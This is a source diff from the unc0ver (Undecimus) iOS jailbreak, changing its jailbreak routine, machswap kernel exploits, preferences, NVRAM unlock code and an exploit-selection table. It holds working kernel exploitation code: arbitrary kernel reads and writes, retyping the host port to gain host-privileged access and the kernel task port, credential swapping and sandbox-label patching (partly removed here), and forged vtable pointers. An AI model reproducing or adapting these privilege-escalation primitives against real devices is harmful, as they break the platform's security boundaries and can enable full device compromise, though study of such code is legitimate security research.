@@ -1231,7 +1273,7 @@ void jailbreak()
         // Test dpkg
         if (!pkgIsConfigured("dpkg")) {
             LOG("Extracting dpkg...");
-            _assert(extractDebsForPkg(@"dpkg", debsToInstall, false), localize(@"Unable to extract dpkg."), true);
+            _assert(extractDebsForPkg(@"dpkg", debsToInstall, false, doInject), localize(@"Unable to extract dpkg."), true);
             inject_trust_cache();
             NSString *const dpkg_deb = debForPkg(@"dpkg");
             _assert(installDeb(dpkg_deb.UTF8String, true), localize(@"Unable to install deb for dpkg."), true);
@@ -1280,7 +1322,7 @@ void jailbreak()
             _assert(installDebs(debsToInstall, true, true), localize(@"Unable to install manually extracted debs."), true);
         }
         
-        _assert(ensure_directory("/etc/apt/undecimus", 0, 0755), localize(@"Unable to create local repo."), true);
+        _assert(ensure_directory("/etc/apt/undecimus", root_pw->pw_uid, 0755), localize(@"Unable to create local repo."), true);
         clean_file("/etc/apt/sources.list.d/undecimus.list");
         char const *listPath = "/etc/apt/undecimus/undecimus.list";
         NSString *const listContents = @"deb file:///var/lib/undecimus/apt ./\n";
@@ -1289,7 +1331,7 @@ void jailbreak()
             clean_file(listPath);
             [listContents writeToFile:@(listPath) atomically:NO encoding:NSUTF8StringEncoding error:nil];
         }
-        init_file(listPath, 0, 0644);
+        init_file(listPath, root_pw->pw_uid, 0644);
         const char *prefsPath = "/etc/apt/undecimus/preferences";
         NSString *prefsContents = @"Package: *\nPin: release o=Undecimus\nPin-Priority: 1001\n";
         NSString *existingPrefs = [NSString stringWithContentsOfFile:@(prefsPath) encoding:NSUTF8StringEncoding error:nil];
@@ -1297,10 +1339,10 @@ void jailbreak()
             clean_file(prefsPath);
             [prefsContents writeToFile:@(prefsPath) atomically:NO encoding:NSUTF8StringEncoding error:nil];
         }
-        init_file(prefsPath, 0, 0644);
+        init_file(prefsPath, root_pw->pw_uid, 0644);
         NSString *const repoPath = pathForResource(@"apt");
         _assert(repoPath != nil, localize(@"Unable to get repo path."), true);
-        ensure_directory("/var/lib/undecimus", 0, 0755);
+        ensure_directory("/var/lib/undecimus", root_pw->pw_uid, 0755);
         ensure_symlink([repoPath UTF8String], "/var/lib/undecimus/apt");
         if (!pkgIsConfigured("apt1.4") || !aptUpdate()) {
             NSArray *const aptNeeded = resolveDepsForPkg(@"apt1.4", false);
@@ -1325,11 +1367,11 @@ void jailbreak()
             sync_prefs();
         }
         // Now that things are running, let's install the deb for the files we just extracted
-        if (needSubstrate) {
+        if (needSubstitutor) {
             if (pkgIsInstalled("com.ex.substitute")) {
                 _assert(removePkg("com.ex.substitute", true), localize(@"Unable to remove Substitute."), true);
             }
-            _assert(aptInstall(@[@"mobilesubstrate"]), localize(@"Unable to install Substrate."), true);
+            _assert(aptInstall(@[@(substitutor->package_id)]), localize(@"Unable to install %s.", substitutor->name), true);
         }
         if (!betaFirmware) {
             if (pkgIsInstalled("com.parrotgeek.nobetaalert")) {
@@ -1345,10 +1387,10 @@ void jailbreak()
         NSData *const file_data = [[NSString stringWithFormat:@"%f\n", kCFCoreFoundationVersionNumber] dataUsingEncoding:NSUTF8StringEncoding];
         if (![[NSData dataWithContentsOfFile:@"/.installed_unc0ver"] isEqual:file_data]) {
             _assert(clean_file("/.installed_unc0ver"), localize(@"Unable to clean old bootstrap marker file."), true);
-            _assert(create_file_data("/.installed_unc0ver", 0, 0644, file_data), localize(@"Unable to create bootstrap marker file."), true);
+            _assert(create_file_data("/.installed_unc0ver", root_pw->pw_uid, 0644, file_data), localize(@"Unable to create bootstrap marker file."), true);
         }
         
-        _assert(ensure_file("/.cydia_no_stash", 0, 0644), localize(@"Unable to disable stashing."), true);
+        _assert(ensure_file("/.cydia_no_stash", root_pw->pw_uid, 0644), localize(@"Unable to disable stashing."), true);
         
         // Make sure everything's at least as new as what we bundled
         rv = system("dpkg --configure -a");
@@ -1359,9 +1401,9 @@ void jailbreak()
         [toInjectToTrustCache addObjectsFromArray:resources];
         inject_trust_cache();
         
-        clean_file("/jb/tar");
-        clean_file("/jb/lzma");
-        clean_file("/jb/substrate.tar.lzma");
+        clean_file(jailbreak_file("tar"));
+        clean_file(jailbreak_file("lzma"));
+        clean_file(jailbreak_file("substrate.tar.lzma"));
         clean_file("/electra");
         clean_file("/chimera");
         clean_file("/.bootstrapped_electra");
@@ -1502,12 +1544,12 @@ void jailbreak()
                    "do echo loading $a;"
                    "launchctl load \"$a\" ;"
                    "done; ");
-            // Substrate is already running, no need to run it again
-            system("for file in /etc/rc.d/*; do "
-                   "if [[ -x \"$file\" && \"$file\" != \"/etc/rc.d/substrate\" ]]; then "
-                   "\"$file\";"
-                   "fi;"
-                   "done");
+            // Substitutor is already running, no need to run it again
+            systemf("for file in /etc/rc.d/*; do "
+                    "if [[ -x \"$file\" && \"$file\" != \"%s\" ]]; then "
+                    "\"$file\";"
+                    "fi;"
+                    "done", substitutor->run_command);
             LOG("Successfully loaded Daemons.");
             
             insertstatus(localize(@"Loaded Daemons.\n"));
@@ -1538,7 +1580,7 @@ void jailbreak()
             // Run uicache.
             
             progress(localize(@"Refreshing icon cache..."));
-            _assert(runCommand("/usr/bin/uicache", NULL) == ERR_SUCCESS, localize(@"Unable to refresh icon cache."), true);
+            _assert(runCommand("/usr/bin/uicache", NULL) >= 0, localize(@"Unable to refresh icon cache."), true);
             prefs->run_uicache = false;
             sync_prefs();
             LOG("Successfully ran uicache.");
@@ -1566,23 +1608,24 @@ void jailbreak()
             // Load Tweaks.
             
             progress(localize(@"Loading Tweaks..."));
+            NSMutableString *waitCommand = [NSMutableString new];
+            [waitCommand appendFormat:@"while [[ ! -f %s ]]; do :; done;", success_file];
+            if (!prefs->auto_respring) {
+                [waitCommand appendFormat:@"while ps -p %d; do :; done;", my_pid];
+            }
             if (prefs->reload_system_daemons && !needStrap) {
                 rv = systemf("nohup bash -c \""
-                             "while ps -p %d;"
-                             "do :;"
-                             "done;"
+                             "%s"
                              "launchctl unload /System/Library/LaunchDaemons/com.apple.backboardd.plist && "
                              "ldrestart ;"
                              "launchctl load /System/Library/LaunchDaemons/com.apple.backboardd.plist"
-                             "\" >/dev/null 2>&1 &", myPid);
+                             "\" >/dev/null 2>&1 &", waitCommand.UTF8String);
             } else {
                 rv = systemf("nohup bash -c \""
-                             "while ps -p %d;"
-                             "do :;"
-                             "done;"
+                             "%s"
                              "launchctl stop com.apple.mDNSResponder ;"
                              "sbreload"
-                             "\" >/dev/null 2>&1 &", myPid);
+                             "\" >/dev/null 2>&1 &", waitCommand.UTF8String);
             }
             _assert(WEXITSTATUS(rv) == ERR_SUCCESS, localize(@"Unable to load tweaks."), true);
             LOG("Successfully loaded Tweaks.");
@@ -1595,6 +1638,8 @@ out:;
 #undef sync_prefs
 #undef write_test_file
 #undef inject_trust_cache
+    stage = maxStage;
+    update_stage();
     progress(localize(@"Deinitializing jailbreak..."));
     LOG("Deinitializing kernel code execution...");
     term_kexec();
@@ -1605,8 +1650,8 @@ out:;
     myCredAddr = myOriginalCredAddr;
     _assert(give_creds_to_process_at_addr(myProcAddr, myCredAddr) == kernelCredAddr, localize(@"Unable to drop kernel's credentials."), true);
     LOG("Downgrading host port...");
-    _assert(setuid(myUid) == ERR_SUCCESS, localize(@"Unable to set user id."), true);
-    _assert(getuid() == myUid, localize(@"Unable to verify user id."), true);
+    _assert(setuid(my_uid) == ERR_SUCCESS, localize(@"Unable to set user id."), true);
+    _assert(getuid() == my_uid, localize(@"Unable to verify user id."), true);
     LOG("Restoring shenanigans pointer...");
     _assert(WriteKernel64(getoffset(shenanigans), Shenanigans), localize(@"Unable to restore shenanigans in kernel memory."), true);
     LOG("Deallocating ports...");
@@ -1614,8 +1659,6 @@ out:;
     myHost = HOST_NULL;
     _assert(mach_port_deallocate(mach_task_self(), myOriginalHost) == KERN_SUCCESS, localize(@"Unable to deallocate my original host port."), true);
     myOriginalHost = HOST_NULL;
-#undef progress
-    removeProgressHUD(hud);
     insertstatus(([NSString stringWithFormat:@"\nRead %zu bytes from kernel memory\nWrote %zu bytes to kernel memory\n", kreads, kwrites]));
     insertstatus(([NSString stringWithFormat:@"\nJailbroke in %ld seconds\n", time(NULL) - start_time]));
     status(localize(@"Jailbroken"), false, false);
@@ -1624,8 +1667,9 @@ out:;
     forceRespring &= (!usedPersistedKernelTaskPort);
     forceRespring &= (!prefs->load_tweaks);
     bool willRespring = (forceRespring);
-    willRespring |= (prefs->load_tweaks);
+    willRespring |= (prefs->load_tweaks && !prefs->ssh_only);
     release_prefs(&prefs);
+    _assert(create_file(success_file, mobile_pw->pw_uid, 644), localize(@"Unable to create success file."), true);
     showAlert(@"Jailbreak Completed", [NSString stringWithFormat:@"%@\n\n%@\n%@", localize(@"Jailbreak Completed with Status:"), status, localize(willRespring ? @"The device will now respring." : @"The app will now exit.")], true, false);
     if (sharedController.canExit) {
         if (forceRespring) {

Undecimus/source/machswap2_pwn.m

@@ -625,6 +625,8 @@ extern uint64_t kernel_base;
 extern uint64_t kernel_slide;
 extern uint64_t ReadKernel64(uint64_t kaddr);
 extern void WriteKernel64(uint64_t kaddr, uint64_t val);
+extern uint32_t ReadKernel32(uint64_t kaddr);
+extern void WriteKernel32(uint64_t kaddr, uint32_t val);
 extern uint64_t cached_proc_struct_addr;
 
 // ********** ********** ********** ye olde pwnage ********** ********** **********
@@ -648,13 +650,11 @@ kern_return_t machswap2_exploit(machswap_offsets_t *offsets)
     int total_pipes = 0;
     
     host_t host = HOST_NULL;
-    host_t original_host = HOST_NULL;
     thread_t thread = THREAD_NULL;
     
     /********** ********** data hunting ********** **********/
 
     host = mach_host_self();
-    original_host = host;
     thread = mach_thread_self();
     vm_size_t pgsz = 0;
     ret = _host_page_size(host, &pgsz);
@@ -1241,6 +1241,14 @@ value = value | ((uint64_t)read64_tmp << 32);\
     uint64_t itk_space = 0x0;
     rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);
     LOG("itk_space: 0x%llx", itk_space);
+    
+    uint64_t is_table = 0x0;
+    rk64(itk_space + 0x20, is_table);
+    LOG("is_table: 0x%llx", is_table);
+    
+    uint64_t host_port_addr = 0x0;
+    rk64(is_table + (MACH_PORT_INDEX(host) * 0x18), host_port_addr);
+    LOG("host_port_addr: 0x%llx", host_port_addr);
 
     uint64_t ourtask = 0x0;
     rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
@@ -1516,46 +1524,14 @@ value = value | ((uint64_t)read64_tmp << 32);\
         allows the kernel task port to be accessed by any root process 
     */
     WriteKernel64(realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
-
-    /* eleveate creds to kernel */
     
-    uint64_t orig_ucred = ReadKernel64(ourproc + offsets->struct_offsets.proc_ucred);
-    LOG("original ucred: 0x%llx", orig_ucred);
-
-    int orig_uid = getuid();
-
-    uint64_t kern_ucred = ReadKernel64(kernproc + offsets->struct_offsets.proc_ucred);
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, kern_ucred);
+    uint32_t original_type = ReadKernel32(host_port_addr);
+    WriteKernel32(host_port_addr, IO_BITS_ACTIVE | IKOT_HOST_PRIV);
     
-    LOG("setuid: %d, uid: %d", setuid(0), getuid());
-    if (getuid() != 0)
-    {
-        LOG("failed to elevate to root/kernel creds!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-
-    host = mach_host_self();
     mach_port_t hsp4;
     ret = host_get_special_port(host, HOST_LOCAL_NODE, 4, &hsp4);
-    mach_port_deallocate(mach_task_self(), host);
-    host = original_host;
     
-    /* de-elevate */
-
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, orig_ucred);
-    
-    LOG("setuid: %d, uid: %d", setuid(orig_uid), getuid());
-    if (getuid() != orig_uid)
-    {
-        LOG("failed to de-elelvate to uid: %d", orig_uid);
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    /* unsandbox */
-    uint64_t cr_label = ReadKernel64(orig_ucred + 0x78);
-    WriteKernel64(cr_label + 0x10, 0);
+    WriteKernel32(host_port_addr, original_type);
 
     if (ret != KERN_SUCCESS ||
         !MACH_PORT_VALID(hsp4))
@@ -1615,7 +1591,6 @@ out:;
     if (MACH_PORT_VALID(host)) {
         mach_port_deallocate(mach_task_self(), host);
         host = HOST_NULL;
-        original_host = HOST_NULL;
     }
     
     if (MACH_PORT_VALID(thread)) {

Undecimus/source/machswap_pwn.m

@@ -341,6 +341,8 @@ extern uint64_t kernel_base;
 extern uint64_t kernel_slide;
 extern uint64_t ReadKernel64(uint64_t kaddr);
 extern void WriteKernel64(uint64_t kaddr, uint64_t val);
+extern uint32_t ReadKernel32(uint64_t kaddr);
+extern void WriteKernel32(uint64_t kaddr, uint32_t val);
 extern uint64_t cached_proc_struct_addr;
 
 // ********** ********** ********** ye olde pwnage ********** ********** **********
@@ -356,13 +358,11 @@ kern_return_t machswap_exploit(machswap_offsets_t *offsets)
     mach_port_t after[0x1000] = { };
     
     host_t host = HOST_NULL;
-    host_t original_host = HOST_NULL;
     thread_t thread = THREAD_NULL;
 
     /********** ********** data hunting ********** **********/
 
     host = mach_host_self();
-    original_host = host;
     thread = mach_thread_self();
     vm_size_t pgsz = 0;
     ret = _host_page_size(host, &pgsz);
@@ -687,6 +687,24 @@ value = value | ((uint64_t)read64_tmp << 32)
         goto out;
     }
     LOG("itk_space: 0x%llx", itk_space);
+    
+    uint64_t is_table = 0x0;
+    rk64(itk_space + 0x20, is_table);
+    if (is_table == 0x0) {
+        LOG("failed to find is_table!");
+        ret = KERN_FAILURE;
+        goto out;
+    }
+    LOG("is_table: 0x%llx", is_table);
+    
+    uint64_t host_port_addr = 0x0;
+    rk64(is_table + (MACH_PORT_INDEX(host) * 0x18), host_port_addr);
+    if (host_port_addr == 0x0) {
+        LOG("failed to find host_port_addr!");
+        ret = KERN_FAILURE;
+        goto out;
+    }
+    LOG("host_port_addr: 0x%llx", host_port_addr);
 
     uint64_t ourtask = 0x0;
     rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
@@ -957,61 +975,14 @@ value = value | ((uint64_t)read64_tmp << 32)
         allows the kernel task port to be accessed by any root process 
     */
     WriteKernel64(realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
-
-    /* eleveate creds to kernel */
     
-    int orig_uid = getuid();
-
-    uint64_t orig_ucred = ReadKernel64(ourproc + offsets->struct_offsets.proc_ucred);
-    if (orig_ucred == 0x0)
-    {
-        LOG("failed to get orig_ucred!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    LOG("orig_ucred: 0x%llx", orig_ucred);
-
-    uint64_t kern_ucred = ReadKernel64(kernproc + offsets->struct_offsets.proc_ucred);
-    if (kern_ucred == 0x0)
-    {
-        LOG("failed to get kern_ucred!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    LOG("kern_ucred: 0x%llx", kern_ucred);
+    uint32_t original_type = ReadKernel32(host_port_addr);
+    WriteKernel32(host_port_addr, IO_BITS_ACTIVE | IKOT_HOST_PRIV);
     
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, kern_ucred);
-    
-    LOG("setuid: %d, uid: %d", setuid(0), getuid());
-    if (getuid() != 0)
-    {
-        LOG("failed to elevate to root/kernel creds!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    
-    host = mach_host_self();
     mach_port_t hsp4;
     ret = host_get_special_port(host, HOST_LOCAL_NODE, 4, &hsp4);
-    mach_port_deallocate(mach_task_self(), host);
-    host = original_host;
     
-    /* de-elevate */
-
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, orig_ucred);
-
-    LOG("setuid: %d, uid: %d", setuid(orig_uid), getuid());
-    if (getuid() != orig_uid)
-    {
-        LOG("failed to de-elevate to uid: %d", orig_uid);
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    /* unsandbox */
-    uint64_t cr_label = ReadKernel64(orig_ucred + 0x78);
-    WriteKernel64(cr_label + 0x10, 0);
+    WriteKernel32(host_port_addr, original_type);
 
     if (ret != KERN_SUCCESS ||
         !MACH_PORT_VALID(hsp4))
@@ -1034,7 +1005,6 @@ value = value | ((uint64_t)read64_tmp << 32)
     if (MACH_PORT_VALID(host)) {
         mach_port_deallocate(mach_task_self(), host);
         host = MACH_PORT_NULL;
-        original_host = HOST_NULL;
     }
     
     if (MACH_PORT_VALID(thread)) {

Undecimus/source/prefs.h

@@ -31,8 +31,11 @@
 #define K_HIDE_LOG_WINDOW          "HideLogWindow"
 #define K_RESET_CYDIA_CACHE        "ResetCydiaCache"
 #define K_SSH_ONLY                 "SSHOnly"
+#define K_DARK_MODE                "DarkMode"
 #define K_ENABLE_GET_TASK_ALLOW    "DoEnableGetTaskAllow"
 #define K_SET_CS_DEBUGGED          "SetCSDebugged"
+#define K_AUTO_RESPRING            "AutoRespring"
+#define K_CODE_SUBSTITUTOR         "CodeSubstitutor"
 
 typedef struct {
     bool load_tweaks;
@@ -55,7 +58,10 @@ typedef struct {
     bool enable_get_task_allow;
     bool set_cs_debugged;
     bool hide_log_window;
+    bool auto_respring;
+    bool dark_mode;
     int exploit;
+    int code_substitutor;
 } prefs_t;
 
 prefs_t *new_prefs(void);

Undecimus/source/prefs.m

@@ -63,6 +63,9 @@ bool load_prefs(prefs_t *prefs) {
     prefs->set_cs_debugged = (bool)[[userDefaults objectForKey:@K_SET_CS_DEBUGGED inDomain:prefsFile] boolValue];
     prefs->exploit = (int)[[userDefaults objectForKey:@K_EXPLOIT inDomain:prefsFile] intValue];
     prefs->hide_log_window = (bool)[[userDefaults objectForKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile] boolValue];
+    prefs->auto_respring = (bool)[[userDefaults objectForKey:@K_AUTO_RESPRING inDomain:prefsFile] boolValue];
+    prefs->dark_mode = (bool)[[userDefaults objectForKey:@K_DARK_MODE inDomain:prefsFile] boolValue];
+    prefs->code_substitutor = (int)[[userDefaults objectForKey:@K_CODE_SUBSTITUTOR inDomain:prefsFile] intValue];
     return true;
 }
 
@@ -91,6 +94,9 @@ bool set_prefs(prefs_t *prefs) {
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->set_cs_debugged] forKey:@K_SET_CS_DEBUGGED inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithInt:(int)prefs->exploit] forKey:@K_EXPLOIT inDomain:prefsFile];
     [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->hide_log_window] forKey:@K_HIDE_LOG_WINDOW inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->auto_respring] forKey:@K_AUTO_RESPRING inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithBool:(BOOL)prefs->dark_mode] forKey:@K_DARK_MODE inDomain:prefsFile];
+    [userDefaults setObject:[NSNumber numberWithInt:(int)prefs->code_substitutor] forKey:@K_CODE_SUBSTITUTOR inDomain:prefsFile];
     [userDefaults synchronize];
     return true;
 }
@@ -116,13 +122,31 @@ void register_default_prefs() {
     defaults[@K_ENABLE_GET_TASK_ALLOW] = @YES;
     defaults[@K_SET_CS_DEBUGGED] = @NO;
     defaults[@K_HIDE_LOG_WINDOW] = @NO;
+    defaults[@K_AUTO_RESPRING] = @NO;
+    defaults[@K_DARK_MODE] = @YES;
     defaults[@K_EXPLOIT] = [NSNumber numberWithInteger:recommendedJailbreakSupport()];
+    defaults[@K_CODE_SUBSTITUTOR] = [NSNumber numberWithInteger:recommendedSubstitutorSupport()];
     [userDefaults registerDefaults:defaults];
 }
 
 void repair_prefs() {
     prefs_t *prefs = copy_prefs();
-    if (!supportsExploit(prefs->exploit)) prefs->exploit = (int)recommendedJailbreakSupport();
+    if (prefs->exploit != -1) {
+        exploit_info_t *exploit_info = get_exploit_info(prefs->exploit);
+        if (exploit_info != NULL) {
+            if (!checkDeviceSupport(exploit_info->device_support_info)) {
+                prefs->exploit = (int)recommendedJailbreakSupport();
+            }
+        }
+    }
+    if (prefs->code_substitutor != -1) {
+        substitutor_info_t *substitutor_info = get_substitutor_info(prefs->code_substitutor);
+        if (substitutor_info != NULL) {
+            if (!checkDeviceSupport(substitutor_info->device_support_info)) {
+                prefs->code_substitutor = (int)recommendedSubstitutorSupport();
+            }
+        }
+    }
     set_prefs(prefs);
     release_prefs(&prefs);
 }

Undecimus/source/unlocknvram.c

@@ -72,7 +72,7 @@ int unlocknvram(void) {
         kernel_xpaci(buf[searchNVRAMProperty / sizeof(uint64_t)]);
 
     // allocate buffer in kernel
-    fake_vtable_xpac = kmem_alloc_wired(kernel_buffer_size);
+    fake_vtable_xpac = IOMalloc(kernel_buffer_size);
     
     // Forge the pacia pointers to the virtual methods.
     size_t count = 0;
@@ -119,7 +119,7 @@ int locknvram(void) {
     }
     
     WriteKernel64(obj, orig_vtable);
-    kmem_free(fake_vtable_xpac, kernel_buffer_size);
+    SafeIOFreeNULL(fake_vtable_xpac, kernel_buffer_size);
 
     LOG("Locked nvram");
     return 0;

Undecimus/source/utils.h

@@ -10,6 +10,7 @@
 #define _UTILS_H
 #import <sys/types.h>
 #import <sys/stat.h>
+#include <mach/machine.h>
 #import "ArchiveFile.h"
 
 #define system(x) _system(x)
@@ -32,6 +33,63 @@ typedef enum {
     kalloc_crash
 } exploit_t;
 
+typedef enum {
+    substrate_substitutor = 0,
+} substitutor_t;
+
+typedef enum {
+    jailbreak_capability = 0,
+    respring_capability,
+    reboot_capability
+} exploit_capability_t;
+
+typedef enum {
+    lowest_exploit_reliability = 0,
+    low_exploit_reliability,
+    middle_exploit_reliability,
+    high_exploit_reliability,
+    highest_exploit_reliability
+} exploit_reliability;
+
+typedef struct {
+    const char *min_kernel_version;
+    const char *max_kernel_version;
+    bool (^handler)(void);
+} device_support_info_t;
+
+typedef struct {
+    exploit_t exploit;
+    const char *name;
+    exploit_capability_t exploit_capability;
+    exploit_reliability exploit_reliability;
+    device_support_info_t device_support_info;
+} exploit_info_t;
+
+typedef enum {
+    lowest_substitutor_stability = 0,
+    low_substitutor_stability,
+    middle_substitutor_stability,
+    high_substitutor_stability,
+    highest_substitutor_stability
+} substitutor_stability;
+
+typedef struct {
+    substitutor_t substitutor;
+    const char *name;
+    const char *package_id;
+    const char *startup_executable;
+    const char *server_executable;
+    const char *run_command;
+    const char *loader_killswitch;
+    const char *bootstrap_tools;
+    substitutor_stability substitutor_stability;
+    device_support_info_t device_support_info;
+    char **resources;
+} substitutor_info_t;
+
+extern exploit_info_t *exploit_infos[];
+extern substitutor_info_t *substitutor_infos[];
+
 enum hashtype {
     HASHTYPE_MD5 = 0,
     HASHTYPE_SHA1
@@ -90,8 +148,8 @@ bool pkgIsInstalled(char *packageID);
 bool pkgIsConfigured(char *packageID);
 bool pkgIsBy(const char *maintainer, const char *packageID);
 bool compareInstalledVersion(const char *packageID, const char *op, const char *version);
-bool extractDeb(NSString *debPath);
-bool extractDebs(NSArray <NSString *> *debPaths);
+bool extractDeb(NSString *debPath, bool doInject);
+bool extractDebs(NSArray <NSString *> *debPaths, bool doInject);
 bool installDeb(const char *debName, bool forceDeps);
 bool installDebs(NSArray <NSString*> *debs, bool forceDeps, bool forceAll);
 bool removePkg(char *packageID, bool forceDeps);
@@ -126,11 +184,15 @@ bool machineNameContains(const char *string);
 bool multi_path_tcp_enabled(void);
 bool jailbreakEnabled(void);
 NSString *getKernelBuildVersion(void);
-bool supportsExploit(exploit_t exploit);
+exploit_info_t *get_exploit_info(exploit_t exploit);
+substitutor_info_t *get_substitutor_info(substitutor_t substitutor);
+bool checkDeviceSupport(device_support_info_t device_support);
 bool jailbreakSupported(void);
+bool substitutorSupported(void);
 bool respringSupported(void);
 bool restartSupported(void);
 NSInteger recommendedJailbreakSupport(void);
+NSInteger recommendedSubstitutorSupport(void);
 NSInteger recommendedRestartSupport(void);
 NSInteger recommendedRespringSupport(void);
 bool daemonIsLoaded(char *daemonID);
@@ -167,6 +229,7 @@ void waitFor(int seconds);
 bool blockDomainWithName(const char *name);
 bool unblockDomainWithName(const char *name);
 bool cydiaIsInstalled(void);
+NSString *localize(NSString *str, ...);
 
 extern NSData *lastSystemOutput;
 

Undecimus/source/utils.m

@@ -31,6 +31,149 @@ int logfd=-1;
 bool injectedToTrustCache = false;
 NSMutableArray *toInjectToTrustCache = nil;
 
+exploit_info_t *exploit_infos[] = {
+    &(exploit_info_t)
+    {
+        .exploit = empty_list_exploit,
+        .name = "Empty List",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = lowest_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.60.19~25",
+        .device_support_info.handler = NULL,
+    },
+    &(exploit_info_t)
+    {
+        .exploit = multi_path_exploit,
+        .name = "Multi Path",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = low_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.52.2~8",
+        .device_support_info.handler = ^bool (void) {
+            if (!multi_path_tcp_enabled())
+                return false;
+            return true;
+        },
+    },
+    &(exploit_info_t)
+    {
+        .exploit = async_wake_exploit,
+        .name = "Async Wake",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = highest_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.20.62~4",
+        .device_support_info.handler = NULL,
+    },
+    &(exploit_info_t)
+    {
+        .exploit = voucher_swap_exploit,
+        .name = "Voucher Swap",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = high_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.240.8~8",
+        .device_support_info.handler = ^bool (void) {
+            if (get_kernel_page_size() != 0x4000)
+                return false;
+            else if (machineNameContains("iPad5,") && kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0)
+                return false;
+            return true;
+        },
+    },
+    &(exploit_info_t)
+    {
+        .exploit = mach_swap_exploit,
+        .name = "Mach Swap",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = middle_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.240.8~8",
+        .device_support_info.handler = ^bool (void) {
+            if (get_kernel_page_size() != 0x1000 &&
+                !machineNameContains("iPad5,") &&
+                !machineNameContains("iPhone8,") &&
+                !machineNameContains("iPad6,"))
+                return false;
+            return true;
+        },
+    },
+    &(exploit_info_t)
+    {
+        .exploit = mach_swap_2_exploit,
+        .name = "Mach Swap 2",
+        .exploit_capability = jailbreak_capability,
+        .exploit_reliability = middle_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.240.8~8",
+        .device_support_info.handler = NULL,
+    },
+    &(exploit_info_t)
+    {
+        .exploit = deja_xnu_exploit,
+        .name = "Deja XNU",
+        .exploit_capability = respring_capability,
+        .exploit_reliability = middle_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.70.24~9",
+        .device_support_info.handler = ^bool (void) {
+            if (jailbreakEnabled())
+                return false;
+            return true;
+        },
+    },
+    &(exploit_info_t)
+    {
+        .exploit = necp_exploit,
+        .name = "Necp",
+        .exploit_capability = reboot_capability,
+        .exploit_reliability = highest_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4570.70.24~9",
+        .device_support_info.handler = NULL,
+    },
+    &(exploit_info_t)
+    {
+        .exploit = kalloc_crash,
+        .name = "Kalloc Crash",
+        .exploit_capability = reboot_capability,
+        .exploit_reliability = high_exploit_reliability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.252.2~2",
+        .device_support_info.handler = NULL,
+    },
+    NULL,
+};
+
+substitutor_info_t *substitutor_infos[] = {
+    &(substitutor_info_t)
+    {
+        .substitutor = substrate_substitutor,
+        .name = "Substrate",
+        .package_id = "mobilesubstrate",
+        .startup_executable = "/usr/libexec/substrate",
+        .server_executable = "/usr/libexec/substrated",
+        .run_command = "/etc/rc.d/substrate",
+        .loader_killswitch = "/var/tmp/.substrated_disable_loader",
+        .bootstrap_tools = "/usr/lib/substrate",
+        .substitutor_stability = highest_substitutor_stability,
+        .device_support_info.min_kernel_version = "4397.0.0.2.4~1",
+        .device_support_info.max_kernel_version = "4903.240.8~8",
+        .device_support_info.handler = ^bool (void) {
+            if (machineNameContains("iPhone11,") || machineNameContains("iPad8,"))
+                return false;
+            return true;
+        },
+        .resources = (char **)&(const char*[]) {
+            "/usr/libexec/substrate",
+            "/usr/libexec/substrated",
+            NULL,
+        },
+    },
+    NULL,
+};
+
 NSData *lastSystemOutput=nil;
 void injectDir(NSString *dir) {
     NSFileManager *fm = [NSFileManager defaultManager];
@@ -234,7 +377,7 @@ bool runDpkg(NSArray <NSString*> *args, bool forceDeps, bool forceAll) {
     return !WEXITSTATUS(rv);
 }
 
-bool extractDeb(NSString *debPath) {
+bool extractDeb(NSString *debPath, bool doInject) {
     if (![debPath hasSuffix:@".deb"]) {
         LOG(@"%@: not a deb", debPath);
         return NO;
@@ -262,7 +405,7 @@ bool extractDeb(NSString *debPath) {
         [deb extractFileNum:3 toFd:pipe.fileHandleForWriting.fileDescriptor];
     });
     bool result = [tar extractToPath:@"/"];
-    if ((kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) && result) {
+    if (doInject && result) {
         chdir("/");
         NSMutableArray *toInject = [NSMutableArray new];
         NSDictionary *files = tar.files;
@@ -287,13 +430,13 @@ bool extractDeb(NSString *debPath) {
     return result;
 }
 
